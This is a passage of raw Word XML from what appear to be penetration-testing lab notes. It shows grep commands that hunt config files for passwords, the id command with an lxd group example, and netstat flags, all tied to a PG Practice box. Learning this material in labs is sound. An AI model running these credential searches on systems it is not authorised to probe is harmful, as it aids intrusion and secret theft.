      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">or any other config files. They usually have some passwords and username, like maybe SQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="257"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can use this to read many files at the same time for interesting stuff when we see many interesting file in the current directory we are in:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="257"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="257"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat * | grep -i passw*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="257"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">the -i flag in the grep command stands for "ignore case".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015ED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="257"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat * | grep -i [any usernames or something you're looking for]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="257"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -ri passw* .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="257"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Recursively look</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="257"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If there are binary files in the directory, "cat" will stop, so here are some ways to avoid it:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="257"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -i "postgres" *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="257"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This reads all files in the current directory without using "cat"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015F3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="257"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"Cat" not really necessary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="257"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -ai "postgres" *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="257"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The flag "-a" forces all files (including binary) to be text</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="257"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Inside the output should include the name of the file on the left, and you can use that for further inspection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015F7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015F8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding the id:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="238"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="238"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id command provides detailed information about the current user, including their user ID (UID), group ID (GID), and group memberships</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="238"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Example:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> uid=1000(mike) gid=1000(mike) groups=1000(mike),108(lxd)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="238"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">uid=1000(mike)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="126"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UID (User ID): The unique numeric identifier for the user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015FE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="126"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mike</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: The username associated with UID </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1000</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015FF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="126"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UID </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1000</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is typically the first regular user created on a system (e.g., during OS installation).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001600">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="978"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gid=1000(mike)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001601">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="107"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GID (Group ID): The unique numeric identifier for the user's primary group.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001602">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="107"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mike</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: The name of the group associated with GID </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1000</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001603">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="107"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">By default, a new user often gets a primary group with the same name as their username.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001604">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="132"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">groups=1000(mike),108(lxd)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001605">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="827"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Group Memberships: Lists all groups the user belongs to:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001606">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="827"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1000(mike): The user's primary group.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="827"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">108(lxd): A supplementary group the user is a member of. In this case, the lxd group, often used for managing LXD containers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001608">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016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0A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_2ipg2fsau8q" w:id="183"/>
      <w:bookmarkEnd w:id="183"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">netstat (to look at open ports)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000160B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000160C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">netstat -ano </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(for Linux, it would be</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> netstat -tulnp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">was used in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId434">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Nickel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice to find that port 80 was open even though the external NMAP scan said it was closed. This shows that internal netstat commands tell us a lot more than an external NMAP scan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000160D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-t</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: TCP connections</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000160E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-u</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: UDP connections</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000160F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-l</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Only show listening sockets</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001610">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-n</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
